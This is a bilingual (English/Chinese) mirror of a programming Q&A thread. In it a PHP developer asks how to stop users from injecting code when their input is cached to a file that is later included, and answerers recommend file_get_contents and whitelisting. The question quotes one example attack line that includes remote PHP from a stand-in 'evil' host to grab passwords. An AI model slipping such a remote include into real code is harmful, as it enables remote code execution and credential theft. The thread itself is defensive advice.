[英]Php. User can write data in a file and i include the file
User writes categories ( name
, url
) in mysql. 用户在mysql中编写类别(
name
, url
)。
On each write/change name
and url
I plan to write also in txt or php file on a server. 我计划在每个写入/更改
name
和url
也以服务器上的txt或php文件写入。 With aim on each page re/load instead of connecting to mysql, just to include the txt or php file. 在目标页面上重新加载而不是连接到mysql,仅包括txt或php文件。
Now i imagine a situation. 现在我想象一种情况。 For example, user as
name
of category writes something include("http://www.evil/get-passwords.php");
例如,作为类别
name
的用户写了include("http://www.evil/get-passwords.php");
So in txt or php file I may have such code and when include in php the code will execute? 所以在txt或php文件中,我可能有这样的代码,当包含在php中时,代码将执行?
How to prevent such situation? 如何预防这种情况? To allow only certain characters to use for name of a category?
要仅允许某些字符用作类别名称?
I would not recommend to use include
for situations like that at all. 我完全不建议在这种情况下使用
include
。 You may have a look at http://php.net/manual/en/function.file-get-contents.php 您可以看看http://php.net/manual/en/function.file-get-contents.php
Using file_get_contents
you are able to avoid script injection, since it reads the file as a pure string. 使用
file_get_contents
可以避免脚本注入,因为它以纯字符串形式读取文件。
Do you plan to let users write into .php
file? 您是否打算让用户写入
.php
文件? That is not a very good idea. 那不是一个好主意。
If you really need this, let them write in simple .txt
files (and double check that apache will not parse txt
as php
). 如果您确实需要这样做,请让他们编写简单的
.txt
文件(并再次检查apache不会将txt
解析为php
)。
For sanitization, the common apporach is to write an allowed list (white-list): 为了进行消毒,通常的做法是编写一个允许的列表(白名单):
$allowedName = array(
'name1',
'name2',
'name3'
// ...
);
Then when user input you can check it: 然后,当用户输入时,您可以检查它:
if (!in_array($_POST['userName'], $allowedName))
die('Not Allowed');
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.